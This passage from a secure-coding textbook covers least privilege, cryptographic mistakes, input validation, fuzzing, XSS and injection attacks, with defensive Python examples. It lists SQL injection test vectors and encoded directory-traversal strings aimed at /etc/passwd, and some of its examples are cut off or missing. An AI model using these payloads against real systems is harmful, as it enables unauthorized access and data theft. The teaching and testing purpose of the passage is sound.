There are several ways to go about searching for coding errors that lead to vulnerabilities in software. One method is by manual code inspection. Developers can be trained to “not make mistakes,” but this approach has not proven successful. This has led to the development of a class of tools designed to analyze code for potential defects. Static code-analysis tools are a type of tool that can be used to analyze software for coding errors that can lead to known types of vulnerabilities and weaknesses. Sophisticated static code analyzers can examine code bases to find function calls of unsafe libraries, potential buffer-overflow conditions, and numerous other conditions. Currently, the CWE describes more than 750 different weaknesses, far too many for developer memory and direct knowledge. In light of this, and due to the fact that some weaknesses are more prevalent than others, MITRE has collaborated with SANS to develop the CWE/SANS Top 25 Most Dangerous Software Errors list. One of the ideas behind the Top 25 list is that it can be updated periodically as the threat landscape changes. Explore the current listing at http://cwe.mitre.org/top25/. There are two main enumerations of common software errors: the Top 25 list maintained by MITRE and the OWASP Top Ten list for web applications. Depending on the type of application being evaluated, these lists provide a solid starting point for security analysis of known error types. MITRE is the repository of the industry standard list for standard programs, and OWASP is for web applications. As the causes of common errors do not change quickly, these lists are not updated every year.

Least Privilege

One of the central paradigms of security is the notion of running a process with the least required privilege. Least privilege requires that the developer understand what privileges are needed specifically for an application to execute and access all its necessary resources. Obviously, from a developer point of view, it would be easier to use administrative-level permission for all tasks, which removes access controls from the equation, but this also removes the very protections that access-level controls are designed to provide. The other end of the spectrum is software designed for operating systems without any built-in security, such as early versions of Windows and some mainframe OSs, where security comes in the form of an application package. When migrating these applications to platforms with built-in security, the issue of access controls arises. As developers increasingly are tasked with incorporating security into their work, the natural tendency is to code around this “new” security requirement, developing in the same fashion as before, as if security is not an issue. This is commonly manifested as a program that runs only under an administrative-level account, or runs as a service utilizing the SYSTEM account for permissions in Windows. Both of these practices are bad practices that reduce security, introduce hard-to-fix errors, and produce code that is harder to maintain and extend.

Tech Tip

2011 CWE/SANS Top 25 Most Dangerous Software Errors
• SQL Injection
• OS Command Injection
• Buffer Overflow
• Cross-Site Scripting (XSS)
• Missing Authentication for Critical Function
• Missing Authorization
• Use of Hard-coded Credentials
• Missing Encryption of Sensitive Data
• Unrestricted Upload of File with Dangerous Type
• Reliance on Untrusted Inputs in a Security Decision
• Execution with Unnecessary Privileges
• Cross-Site Request Forgery (CSRF)
• Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
• Download of Code Without Integrity Check
• Incorrect Authorization
• Inclusion of Functionality from Untrusted Control Sphere
• Incorrect Permission Assignment for Critical Resource
• Use of Potentially Dangerous Function
• Use of a Broken or Risky Cryptographic Algorithm
• Incorrect Calculation of Buffer Size
• Improper Restriction of Excessive Authentication Attempts
• URL Redirection to Untrusted Site (‘Open Redirect’)
• Uncontrolled Format String
• Integer Overflow or Wraparound
• Use of a One-Way Hash without a Salt

Developers who do development and testing on an integrated environment on their own PC—that is, they have a web server and/or database engine on their PC—can produce code that works fine on their machine, where unified account permissions exist (and are frequently administrator). When this code is transitioned to a distributed environment, permissions can become an issue. The proper method is to manage permissions appropriately on the developer box from the beginning.

The key principle in designing and coding software with respect to access-level controls is to plan and understand the nature of the software’s interaction with the operating system and system resources. Whenever the software accesses a file, a system component, or another program, the issue of appropriate access control needs to be addressed. And although the simple practice of just giving everything root or administrative access may solve this immediate problem, it creates much bigger security issues that will be much less apparent in the future. An example is when a program runs correctly when initiated from an administrator account but fails when run under normal user privileges. The actual failure may stem from a privilege issue, but the actual point of failure in the code may be many procedures away, and diagnosing these types of failures is a difficult and time-consuming operation.

When software fails due to an exploited vulnerability, the hacker typically achieves whatever level of privilege that the application had prior to the exploit occurrence. If an application always operates with root-level privilege, this will pass on to the hacker as well.

The bottom line is actually simple. Determine what needs to be accessed and what the appropriate level of permission is, then use that level in design and implementation. Repeat this for every item accessed. In the end, it is rare that administrative access is needed for many functions. Once the application is designed, the whole process will need to be repeated with the installation procedure, because frequently, installing software will need a higher level of access than needed for executing the software. Design and implementation details must be determined with respect to required permission levels, not to a higher level such as administrative root access just for convenience. The cost of failure to heed the principle of least privilege can be twofold. First, you have expensive, time-consuming access-violation errors that are hard to track down and correct. The second problem is when an exploit is found that allows some other program to use portions of your code in an unauthorized fashion. A prime example is the sendmail exploit in the UNIX environment. Because sendmail requires root-level access for some functions, the sendmail exploit inserts foreign code into the process stream, thereupon executing its code at root-level access because the sendmail process thread itself has root-level access. In this case, sendmail needs the root-level access, but this exploit illustrates that the risk is real and will be exploited once found. Proper design can, in many cases, eliminate the need for such high access privilege levels.
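The startup access check and one-way privilege drop below put the principle just described into code: enumerate every resource and the permission it needs, verify them in one place so a failure under the service account is reported where it happens rather than many procedures away, and give up root as soon as the privileged setup is done. This is an added example, not code from the book; the resource list, the scratch directory and the account ids passed to drop_privileges are assumptions.

```python
"""Least-privilege helpers: a fail-fast access check run at startup and a
one-way privilege drop.  Added example, not code from the book; the sample
directory and resource list are constructed for illustration."""
from __future__ import annotations

import os
import tempfile

RW = os.R_OK | os.W_OK


def describe(mode: int) -> str:
    """Human-readable form of an os.access() mode mask."""
    names = [name for flag, name in ((os.R_OK, "read"), (os.W_OK, "write"), (os.X_OK, "execute"))
             if mode & flag]
    return "/".join(names) or "existence"


def check_required_access(required: list[tuple[str, int, str]]) -> list[str]:
    """Verify up front that the account we run as can reach every resource the
    design identified, with the mode it needs.  A program that passes this
    check as the developer's administrator account but fails as the service
    account reports the exact resource and permission here, rather than
    failing many procedures deep in the code where the file is first touched."""
    problems = []
    use_effective = os.access in os.supports_effective_ids
    for path, mode, why in required:
        if not os.path.exists(path):
            problems.append(f"{path}: missing ({why})")
        elif not os.access(path, mode, effective_ids=use_effective):
            problems.append(f"{path}: no {describe(mode)} permission ({why})")
    return problems


def drop_privileges(uid: int, gid: int) -> bool:
    """After any setup that genuinely needs root (binding a low port, reading a
    key file), give it up permanently.  Supplementary groups and gid go first:
    once the uid changes the process can no longer change its gid.  Returns
    False when the process was not root to begin with."""
    if not hasattr(os, "geteuid") or os.geteuid() != 0:
        return False
    os.setgroups([])
    os.setgid(gid)
    os.setuid(uid)
    try:
        os.setuid(0)                     # must now fail: the drop is one-way
    except PermissionError:
        return True
    raise RuntimeError("privilege drop did not stick")


def sample_requirements() -> list[tuple[str, int, str]]:
    """Constructed sample: a scratch directory holding a config file that
    exists and a state database that was never created."""
    base = tempfile.mkdtemp(prefix="leastpriv_")
    cfg = os.path.join(base, "app.conf")
    with open(cfg, "w") as fh:
        fh.write("listen = 8080\n")
    return [
        (cfg, os.R_OK, "read configuration"),
        (os.path.join(base, "state.db"), RW, "persist session state"),
    ]


if __name__ == "__main__":
    for problem in check_required_access(sample_requirements()):
        print("startup check:", problem)
```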
Cryptographic Failures

Hailed as a solution for all problems, cryptography has as much chance of being the ultimate cure-all as did the tonics sold by traveling salesmen of a different era. There is no such thing as a universal solution, yet there are some very versatile tools that provide a wide range of protections. Cryptography falls into this “very useful tool” category. Proper use of cryptography can provide a wealth of programmatic functionality, from authentication and confidentiality to integrity and nonrepudiation. These are valuable tools, and many programs rely on proper cryptographic function for important functionality. The need for this functionality in an application tempts programmers to roll their own cryptographic functions. This is a task fraught with opportunity for catastrophic error. Cryptographic errors come from several common causes. One typical mistake is choosing to develop your own cryptographic algorithm. Development of a secure cryptographic algorithm is far from an easy task, and even when done by experts, weaknesses can occur that make them unusable. Cryptographic algorithms become trusted after years of scrutiny and attacks, and any new algorithms would take years to join the trusted set. If you instead decide to rest on secrecy, be warned that secret or proprietary algorithms have never provided the desired level of protection. One of the axioms of cryptography is that there is no security through obscurity.

Tech Tip

Only Use Approved Cryptographic Functions

Always use vetted and approved libraries for all cryptographic work. Never create your own cryptographic functions, even when using known algorithms. For example, the .NET Framework has a number of cryptography classes that developers can call upon to perform encryption services.

Deciding to use a trusted algorithm is a proper start, but there still are several major errors that can occur. The first is an error in instantiating the algorithm. An easy way to avoid this type of error is to use a library function that has already been properly tested. Sources of these library functions abound, and they provide an economical solution to this functionality’s needs. Once you have an algorithm, and have chosen a particular instantiation, the next item needed is the random number to generate a random key. Cryptographic functions use an algorithm and a key, the latter being a digital number.

The generation of a real random number is not a trivial task. Computers are machines that are renowned for reproducing the same output when given the same input, so generating a pure, nonreproducible random number is a challenge. There are functions for producing random numbers built into the libraries of most programming languages, but these are pseudorandom number generators, and although the distribution of output numbers appears random, it generates a reproducible sequence. Given the same input, a second run of the function will produce the same sequence of “random” numbers. Determining the seed and random sequence and using this knowledge to “break” a cryptographic function has been used more than once to bypass the security. This method was used to subvert an early version of Netscape’s SSL implementation. Using a number that is cryptographically random—suitable for an encryption function—resolves this problem, and again the use of trusted library functions designed and tested for generating such numbers is the proper methodology.

Exam Tip: Never hard-code secrets into code bases. Hackers can use disassemblers and various code differential tools to dissect your code and find static information.

Now you have a good algorithm and a good random number—so where can you go wrong? Well, storing private keys in areas where they can be recovered by an unauthorized person is the next worry. Poor key management has failed many a cryptographic implementation. A famous exploit of getting cryptographic keys from an executable and using them to break a cryptographic scheme is the case of hackers using this exploit to break DVD encryption and develop the DeCSS program. Tools have been developed that can search code for “random” keys and extract the key from the code or running process. The bottom line is simple: do not hard-code secret keys in your code. They can, and will, be discovered. Keys should be generated, and then passed by reference, minimizing the travel of copies across a network or application. Storing them in memory in a noncontiguous fashion is also important, to prevent external detection. Again, trusted cryptographic library functions come to the rescue. You might have deduced by this point that the term “library function” has become synonymous with this section. This is not an accident. In fact, this is probably one of the best pieces of advice from this chapter: use commercially proven functions for cryptographic functionality.
Tech Tip

Microsoft Recommended Deprecated C Functions

Function families to deprecate/remove:

strcpy() and strncpy()
strcat() and strncat()
scanf()
sprintf()
gets()
memcpy(), CopyMemory(), and RtlCopyMemory()
Language-Specific Failures

Modern programming languages are built around libraries that permit reuse and speed the development process. The development of many library calls and functions was done without regard to secure coding implications, and this has led to issues related to specific library functions. As mentioned previously, strcpy() has had its fair share of involvement in buffer overflows and should be avoided. Developing and maintaining a series of deprecated functions and prohibiting their use in new code, while removing them from old code when possible, is a proven path toward more secure code. Banned functions are easily handled via automated code reviews during the check-in process. The challenge is in garnering the developer awareness as to the potential dangers and the value of safer coding practices.
Testing Phase

If the requirements phase marks the beginning of the generation of security in code, then the testing phase marks the other boundary. Although there are additional functions after testing, no one wants a user to validate errors in code. And errors discovered after the code has shipped are the most expensive to fix, regardless of the severity. Employing use cases to compare program responses to known inputs and then comparing the output to the desired output is a proven method of testing software. The design of use cases to test specific functional requirements occurs based on the requirements determined in the requirements phase. Providing additional security-related use cases is the process-driven way of ensuring that security specifics are also tested.

The testing phase is the last opportunity to determine that the software performs properly before the end user experiences problems. Errors found in testing are late in the development process, but at least they are still learned about internally, before the end customer suffers. Testing can occur at each level of development: module, subsystem, system, and completed application. The sooner errors are discovered and corrected, the lower the cost and the lesser the impact will be to project schedules. This makes testing an essential step in the process of developing good programs.

Testing for security requires a much broader series of tests than functional testing does. Misuse cases can be formulated to verify that vulnerabilities cannot be exploited. Fuzz testing (also known as fuzzing) uses random inputs to check for exploitable buffer overflows. Code reviews by design and development teams are used to verify that security elements such as input and output validation are functional, as these are the best defenses against a wide range of attacks, including cross-site scripting and cross-site request forgeries. Code walkthroughs begin with design reviews, architecture examinations, unit testing, subsystem testing, and, ultimately, complete system testing.

Testing includes white-box testing, where the test team has access to the design and coding elements; black-box testing, where the team does not have access; and grey-box testing, where the test team has more information than in black-box testing but not as much as in white-box testing. These modes of testing are used for different objectives; for example, fuzz testing works perfectly fine regardless of the type of testing, whereas certain types of penetration tests are better in a white-box testing environment. Testing is also performed on the production code to verify that error handling and exception reporting, which may provide detailed diagnostic information during development, are squelched to prevent information release during error conditions.

Final code can be subjected to penetration tests, designed specifically to test configuration, security controls, and common defenses such as input and output validation and error handling. Penetration testing can explore the functionality and whether or not specific security controls can be bypassed. Using the attack surface analysis information, penetration testers can emulate adversaries and attempt a wide range of known attack vectors in order to verify that the known methods of attack are all mitigated.

One of the most powerful tools that can be used in testing is fuzzing, the systematic application of a series of malformed inputs to test how the program responds. Fuzzing has been used by hackers for years to find potentially exploitable buffer overflows, without any specific knowledge of the coding. A tester can use a fuzzing framework to automate numerous input sequences. In examining whether a function can fall prey to a buffer overflow, numerous inputs can be run, testing lengths and ultimate payload-delivery options. If a particular input string results in a crash that can be exploited, this input would then be examined in detail. Fuzzing is new to the development scene but is rapidly maturing and will soon be on nearly equal footing with other automated code-checking tools.
Secure Coding Concepts

Application security begins with code that is secure and free of vulnerabilities. Unfortunately, all code has weaknesses and vulnerabilities, so instantiating the code in a manner that has effective defenses preventing the exploitation of vulnerabilities can maintain a desired level of security. Proper handling of configurations, errors and exceptions, and inputs can assist in the creation of a secure application. Testing of the application throughout the system lifecycle can be used to determine the actual security risk profile of a system.

There are numerous individual elements in the secure development lifecycle (SDL) that can assist a team in developing secure code. Correct SDL processes, such as input validation, proper error and exception handling, and cross-site scripting and cross-site request forgery mitigations, can improve the security of code. Process elements such as security testing, fuzzing, and patch management also help to ensure applications meet a desired risk profile.
Error and Exception Handling

Every application will encounter errors and exceptions, and these need to be handled in a secure manner. One attack methodology includes forcing errors to move an application from normal operation to exception handling. During an exception, it is common practice to record/report the condition, including supporting information such as the data that resulted in the error. This information can be invaluable in diagnosing the cause of the error condition. The challenge is in where this information is captured. The best method is to capture it in a log file, where it can be secured by an ACL. The worst case is when it is echoed to the user. Echoing error condition details to users can provide valuable information to attackers when they cause errors on purpose.

Exam Tip: All errors/exceptions should be trapped and handled in the generating routine.

Improper exception handling can lead to a wide range of disclosures. Errors associated with SQL statements can disclose data structures and data elements. Remote procedure call (RPC) errors can give up sensitive information such as filenames, paths, and server names. Programmatic errors can give up line numbers that an exception occurred on, the method that was invoked, and information such as stack elements.
Input and Output Validation

With the move to web-based applications, the errors have shifted from buffer overflows to input-handling issues. Users have the ability to manipulate input, so it is up to the developer to handle the input appropriately to prevent malicious entries from having an effect. Buffer overflows could be considered a class of improper input, but newer attacks include canonicalization attacks and arithmetic attacks. Probably the most important defensive mechanism that can be employed is input validation. Considering all inputs to be hostile until properly validated can mitigate many attacks based on common vulnerabilities. This is a challenge, as the validation efforts need to occur after all parsers have completed manipulating input streams, a common function in web-based applications using Unicode and other international character sets.

Input validation is especially well suited for the following vulnerabilities: buffer overflow, reliance on untrusted inputs in a security decision, cross-site scripting, cross-site request forgery, path traversal, and incorrect calculation of buffer size. Input validation may seem suitable for various injection attacks, but given the complexity of the input and the ramifications from legal but improper input streams, this method falls short for most injection attacks. What can work is a form of recognition and whitelisting approach, where the input is validated and then parsed into a standard structure that is then executed. This restricts the attack surface to not only legal inputs but also expected inputs.

Exam Tip: Consider all input to be hostile. Input validation is one of the most important secure coding techniques employed, mitigating a wide array of potential vulnerabilities.

In today's computing environment, a wide range of character sets is used. Unicode allows multilanguage support. Character code sets allow multilanguage capability. Various encoding schemes, such as hex encoding, are supported to allow diverse inputs. The net result of all these input methods is that there are numerous ways to create the same input to a program. Canonicalization is the process by which application programs manipulate strings to a base form, creating a foundational representation of the input. Canonicalization errors arise from the fact that inputs to a web application may be processed by multiple applications, such as the web server, application server, and database server, each with its own parsers to resolve appropriate canonicalization issues. Where this is an issue relates to the form of the input string at the time of error checking. If the error-checking routine occurs prior to resolution to canonical form, then issues may be missed. The string representing /../, used in directory traversal attacks, can be obscured by encoding and hence missed by a character string match before an application parser manipulates it to canonical form.

The first line of defense is to write solid code. Regardless of the language used, or the source of outside input, prudent programming practice is to treat all input from outside a function as hostile. Validate all inputs as if they were hostile and an attempt to force a buffer overflow. Accept the notion that although during development everyone may be on the same team, be conscientious, and be compliant with design rules, future maintainers may not be as robust.

A second, and equally important, line of defense is proper string handling. String handling is a common event in programs, and string-handling functions are the source of a large number of known buffer-overflow vulnerabilities. Using strncpy() in place of strcpy() is a possible method of improving security because strncpy() requires an input length for the number of characters to be copied. This simple function call replacement can ultimately fail, however, because Unicode and other encoding methods can make character counts meaningless. To resolve this issue requires new library calls, and much closer attention to how input strings, and subsequently output strings, can be abused. Proper use of functions to achieve program objectives is essential to prevent unintended effects such as buffer overflows. Use of the gets() function can probably never be totally safe since it reads from the stdin stream until a linefeed or carriage return. In most cases, there is no way to predetermine whether the input is going to overflow the buffer. A better solution is to use a C++ stream object or the fgets() function. The function fgets() requires an input buffer length, and hence avoids the overflow. Simply replace
Tech Tip

A Rose Is a Rose Is a r%6fse

Canonical form refers to simplest form, and, due to the many encoding schemes in use, can be a complex issue. Characters can be encoded in ASCII, Unicode, hex, UTF-8, or even combinations of these. So, if the attacker desires to obfuscate his response, then several things can happen. By URL encoding URL strings, it may be possible to circumvent filter security systems and IDS:

can become

Double encoding can complicate the matter even further. Round 1 decoding

becomes

Round 2 decoding

becomes

The bottom line is simple: Know that encoding can be used, and plan for it when designing input verification mechanisms. Expect encoded transmissions to be used to attempt to bypass security mechanisms.
Output validation is just as important in many cases as input validation. If querying a database for a username and password match, the expected forms of the output of the match function should be either one match or none. If using record count to indicate the level of match, which is a common practice, then a value other than 0 or 1 would be an error. Defensive coding using output validation would not act on values >1, as these are clearly an error and should be treated as a failure.
Fuzzing

One of the most powerful tools that can be used in testing is fuzzing (a.k.a. fuzz testing), which is the systematic application of a series of malformed inputs to test how the program responds. Fuzzing has been used by hackers for years to find potentially exploitable buffer overflows, without any specific knowledge of the coding. Fuzz testing works perfectly fine regardless of the type of testing, white box or black box. Fuzzing serves as a best practice for finding unexpected input validation errors. A tester can use a fuzzing framework to automate numerous input sequences. In examining whether a function can fall prey to a buffer overflow, a tester can run numerous inputs, testing lengths and ultimate payload-delivery options. If a particular input string results in a crash that can be exploited, the tester would then examine this input in detail. Fuzzing is still relatively new to the development scene but is rapidly maturing and will soon be on nearly equal footing with other automated code-checking tools.
Bug Tracking

Bug tracking is a foundational element in secure development. All bugs are enumerated, classified, and tracked. If the classification of a bug exceeds a set level, then it must be resolved before the code advances to the next level of development. Bugs are classified based on the risk the vulnerability exposes. Microsoft uses four levels:

Critical  A security vulnerability having the highest potential for damage
Important  A security vulnerability having significant potential for damage, but less than Critical
Moderate  A security vulnerability having moderate potential for damage, but less than Important
Low  A security vulnerability having low potential for damage

Examples of Critical vulnerabilities include those that without warning to the user can result in remote exploit involving elevation of privilege. Critical is really reserved for the most important risks. As an example of the distinction between Critical and Important, a vulnerability that would lead to a machine failure requiring reinstallation of software would only score Important. The key difference is that the user would know of this penetration and risk, whereas for a Critical vulnerability, the user may never know that it occurred.

The tracking of errors serves several purposes. First, from a management perspective, what is measured is managed, both by management and by those involved. Over time, fewer errors will occur if the workforce knows they are being tracked, taken seriously, and represent an issue with the product. Second, since not all errors are immediately correctable, this enables future correction when a module is rewritten. Zero defects in code is like zero defects in quality: not an achievable objective. But this does not mean that constant improvement of the process cannot dramatically reduce the error rates. Evidence from firms involved in SAFECode supports this, as they are reaping the benefits of lower error rates and reduced development costs from lower levels of corrective work.
Application Attacks

Attacks against a system can occur at the network level, at the operating system level, at the application level, or at the user level (social engineering). Early attack patterns were against the network, but most of today's attacks are aimed at the applications, primarily because that is where the objective of most attacks resides—in the infamous words of bank robber Willie Sutton, "because that's where the money is." In fact, many of today's attacks on systems use combinations of vulnerabilities in networks, operating systems, and applications, all means to an end to obtain the desired objective of an attack, which is usually some form of data.

Application-level attacks take advantage of several facts associated with computer applications. First, most applications are large programs written by groups of programmers, and by their nature have errors in design and coding that create vulnerabilities. For a list of typical vulnerabilities, see the Common Vulnerabilities and Exposures (CVE) list maintained by MITRE (http://cve.mitre.org). Second, even when vulnerabilities are discovered and patched by software vendors, end users are slow to apply patches, as evidenced by the SQL Slammer incident in January 2003. The vulnerability exploited was a buffer overflow, and the vendor supplied a patch six months prior to the outbreak, yet the worm still spread quickly due to the multitude of unpatched systems.
Cross-Site Scripting

Cross-site scripting (XSS) is one of the most common web attack methodologies.

Cross-site scripting is abbreviated XSS to distinguish it from Cascading Style Sheets (CSS).

A cross-site scripting attack is a code injection attack in which an attacker sends code in response to an input request. This code is then rendered by the web server, resulting in the execution of the code by the web server. Cross-site scripting attacks take advantage of a few common elements in web-based systems. First is the common failure to perform complete input validation. XSS sends script in response to an input request, even when script is not the expected or authorized input type. Second is the nature of web-based systems to dynamically self-create output. Web-based systems are frequently collections of images, text, scripts, and more, which are presented by a web server to a browser that interprets and renders. XSS attacks can exploit the dynamically self-created output by executing a script in the client browser that receives the altered output.

The cause of the vulnerability is weak user input validation. If input is not validated properly, an attacker can include a script in their input and have it rendered as part of the web process. There are several different types of XSS attacks, which are distinguished by the effect of the script:

Nonpersistent XSS attack  The injected script is not persisted or stored, but rather is immediately executed and passed back via the web server.
Persistent XSS attack  The script is permanently stored on the web server or some back-end storage. This allows the script to be used against others who log in to the system.
DOM-based XSS attack  The script is executed in the browser via the Document Object Model (DOM) process as opposed to the web server.

Cross-site scripting attacks can result in a wide range of consequences, and in some cases, the list can be anything that a clever scripter can devise. Common uses that have been seen in the wild include the following:

Theft of authentication information from a web application
Session hijacking
Deploying hostile content
Changing user settings, including future users
Impersonating a user
Phishing or stealing sensitive information

Controls to defend against XSS attacks include the use of anti-XSS libraries to strip scripts from the input sequences. Various other ways to mitigate XSS attacks include limiting types of uploads and screening the size of uploads, whitelisting inputs, and so on, but attempting to remove scripts from inputs can be a tricky task. Well-designed anti-XSS input library functions have proven to be the best defense. Cross-site scripting vulnerabilities are easily tested for and should be a part of the test plan for every application. Testing a variety of encoded and unencoded inputs for scripting vulnerability is an essential test element.
Injections

Use of input to a function without validation has already been shown to be risky behavior. Another issue with unvalidated input is the case of code injection. Rather than the input being appropriate for the function, this code injection changes the function in an unintended way. A SQL injection attack is a form of code injection aimed at any Structured Query Language (SQL)–based database, regardless of vendor.

The primary method of defense against this type of vulnerability is similar to that for buffer overflows: validate all inputs. But rather than validating toward just length, you need to validate inputs for content. Imagine a web page that asks for user input, and then uses that input in the building of a subsequent page. Now imagine that the user puts the text for a JavaScript function in the middle of their input sequence, along with a call to the script. Now, the generated web page has an added JavaScript function that is called when displayed. Passing the user input through an HTML encode function before use can prevent such attacks.

Again, good programming practice goes a long way toward preventing these types of vulnerabilities. This places the burden not just on the programmers, but also on the process of training programmers, the software engineering process that reviews code, and the testing process to catch programming errors. This is much more than a single-person responsibility; everyone involved in the software development process needs to be aware of the types and causes of these errors, and safeguards need to be in place to prevent their propagation.
Tech Tip

Testing for SQL Injection Vulnerability

There are two main steps associated with testing for SQL injection vulnerability. First one needs to confirm that the system is at all vulnerable. This can be done using various inputs to test whether an input variable can be used to manipulate the SQL command. The following are common test vectors used:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

Note that the use of single or double quotes is SQL implementation dependent, as there are syntactic differences between the major database engines. The second step is to use the error message information to attempt to perform an actual exploit against the database.
SQL Injection

A SQL injection attack is a form of code injection aimed at any Structured Query Language (SQL)–based database, regardless of vendor. An example of this type of attack is where the function takes the user-provided inputs for username and password and substitutes them into a where clause of a SQL statement with the express purpose of changing the where clause into one that gives a false answer to the query. Assume the desired SQL statement is

The values JDoe and newpass are provided from the user and are simply inserted into the string sequence. Though seemingly safe functionally, this can be easily corrupted by using the sequence

since this changes the where clause to one that returns all records:

The addition of the or clause, with an always true statement and the beginning of a comment line to block the trailing single quote, alters the SQL statement to one in which the where clause is rendered inoperable.
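The username/password example above, together with the record-count output validation described under "Input and Output Validation", as an added example that is not code from the book: a where clause built by string substitution beside a parameterized query, run against a constructed in-memory SQLite table (the accounts other than JDoe/newpass are made up here).

```python
"""SQL injection: string-built query vs. parameterized query, plus output validation.

Added example, not from the original text. Uses an in-memory SQLite database
with constructed sample accounts; 'JDoe'/'newpass' are the names the text
uses, the other rows are invented for this example.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table. Passwords are stored in clear only to keep
    the example short; a real system stores salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("JDoe", "newpass"), ("asmith", "s3cret"), ("admin", "x9!")],
    )
    return conn


def match_count_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> int:
    """Builds the where clause by string substitution: the inputs become SQL."""
    sql = (
        "SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(sql).fetchone()[0]


def match_count_safe(conn: sqlite3.Connection, username: str, password: str) -> int:
    """Parameterized: the driver passes the inputs as data, never as SQL text."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0]


def login_decision(count: int) -> str:
    """Output validation from the text: 0 or 1 matches are the only legitimate
    results for one identity; anything else is treated as a failure, not success."""
    if count == 1:
        return "allow"
    if count == 0:
        return "deny"
    return "error"  # more than one row for a single identity cannot be valid


def run_sql_demo() -> dict:
    conn = make_db()
    # Vector from the Tech Tip above: closes the quote, adds an always-true
    # OR, and comments out the rest of the where clause.
    inject = "' or 1=1 --"
    return {
        "legit_vulnerable": match_count_vulnerable(conn, "JDoe", "newpass"),
        "inject_vulnerable": match_count_vulnerable(conn, inject, "anything"),
        "legit_safe": match_count_safe(conn, "JDoe", "newpass"),
        "inject_safe": match_count_safe(conn, inject, "anything"),
    }


if __name__ == "__main__":
    results = run_sql_demo()
    for name, count in results.items():
        print("%-18s rows=%d decision=%s" % (name, count, login_decision(count)))
```

With the string-built query the injected input matches every row (3), which the output check turns into an error rather than a login; the parameterized query returns 0 for the same input.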
LDAP Injection

LDAP-based systems are also subject to injection attacks. When an application constructs an LDAP request based on user input, a failure to validate the input can lead to bad LDAP requests. Just as the SQL injection can be used to execute arbitrary commands in a database, the LDAP injection can do the same in a directory system. Something as simple as a wildcard character (*) in a search box can return results that would normally be beyond the scope of a query. Proper input validation is important before passing the request to an LDAP engine.

XML Injection

XML can be tampered with via injection as well. XML injections can be used to manipulate an XML-based system. As XML is nearly ubiquitous in the web application world, this form of attack has a wide range of targets.

Defense Against Injection Attacks

The primary method of defense against injection attacks is similar to that for buffer overflows: validate all inputs. But rather than validating toward just length, you need to validate inputs for content. Imagine a web page that asks for user input, and then uses that input in the building of a subsequent page. Also imagine that the user puts the text for a JavaScript function in the middle of their input sequence, along with a call to the script. Now, the generated web page has an added JavaScript function that is called when displayed. Passing the user input through an HtmlEncode function before use can prevent such attacks.

Exam Tip: For the exam, you should understand injection-type attacks and how they manipulate the systems they are injecting, SQL, LDAP, and XML.
Directory Traversal/Command Injection

A directory traversal attack is when an attacker uses special inputs to circumvent the directory tree structure of the file system. Adding encoded symbols for "../.." in an unvalidated input box can result in the parser resolving the encoding to the traversal code, bypassing many detection elements, and passing the input to the file system and resulting in the program executing commands in a different location than designed. When combined with a command injection, the input can result in execution of code in an unauthorized manner. Classified as input validation errors, these can be difficult to detect without doing code walkthroughs and specifically looking for them. This illustrates the usefulness of the Top 25 Most Dangerous Software Errors checklist during code reviews, as it would alert developers to this issue during development.

Directory traversals can be masked by using encoding of input streams. If the security check is done before the string is decoded by the system parser, then recognition of the attack form may be impaired. There are many ways to represent a particular input form, the simplest of which is the canonical form (introduced earlier in the "A Rose Is a Rose Is a r%6fse" Tech Tip). Parsers are used to render the canonical form for the OS, but these embedded parsers may act after input validation, making it more difficult to detect certain attacks from just matching a string.
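The decode-before-validate point made here and in the "A Rose Is a Rose Is a r%6fse" Tech Tip, as an added example that is not code from the book: a check that string-matches the raw input beside one that canonicalizes first. The base directory and the sample inputs are constructed for the example.

```python
"""Canonicalize, then validate: catching encoded directory traversal.

Added example, not from the original text. Shows why a string match on the
raw input misses percent-encoded and double-encoded forms of '../', and how
decoding to canonical form before the check closes that gap.
"""
import posixpath
from urllib.parse import unquote

# Constructed sample inputs for this example (not from any real system).
SAMPLES = {
    "plain": "../../etc/passwd",
    "single_encoded": "..%2f..%2fetc%2fpasswd",
    "double_encoded": "%252e%252e%252f%252e%252e%252fetc%252fpasswd",
    "mixed_case": "%2E%2e/%2E%2E/etc/passwd",
    "benign": "reports/q1.pdf",
}


def naive_check(raw: str) -> bool:
    """The weak check: rejects only a literal '../' in the undecoded input."""
    return "../" not in raw


def canonicalize(raw: str, max_rounds: int = 5) -> str:
    """Percent-decode repeatedly until the string stops changing (this is
    what defeats double encoding), then normalise the path form. The round
    limit keeps a hostile input from driving an unbounded loop."""
    s = raw
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    # normpath collapses 'a/../b' to 'b' and keeps any leading '..'
    return posixpath.normpath(s)


def is_safe_path(raw: str, base: str = "/var/www/files") -> bool:
    """The hardened check: canonicalize first, then confirm the resolved
    path still lies under the base directory."""
    canon = canonicalize(raw)
    if canon.startswith("/") or "\x00" in canon:
        return False
    resolved = posixpath.normpath(posixpath.join(base, canon))
    return resolved == base or resolved.startswith(base + "/")


def evaluate(samples: dict = SAMPLES) -> dict:
    """Returns {name: (naive_check result, is_safe_path result)}."""
    return {name: (naive_check(v), is_safe_path(v)) for name, v in samples.items()}


if __name__ == "__main__":
    for name, (naive, safe) in evaluate().items():
        print("%-15s naive_passes=%-5s canonical_passes=%s" % (name, naive, safe))
```

Only the plain form is caught by the raw string match; the three encoded forms pass it and are rejected only once the input has been reduced to canonical form.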
Buffer Overflow

If there's one item that could be labeled as the "Most Wanted" in coding security, it would be the buffer overflow. The CERT/CC at Carnegie Mellon University estimates that nearly half of all exploits of computer programs stem historically from some form of buffer overflow. Finding a vaccine to buffer overflows would stamp out half of these security-related incidents, by type, and probably 90 percent by volume. The Morris finger worm in 1988 was an exploit of an overflow, as were more recent big-name events such as Code Red and Slammer. The generic classification of buffer overflows includes many variants, such as static buffer overruns, indexing errors, format string bugs, Unicode and ANSI buffer size mismatches, and heap overruns.

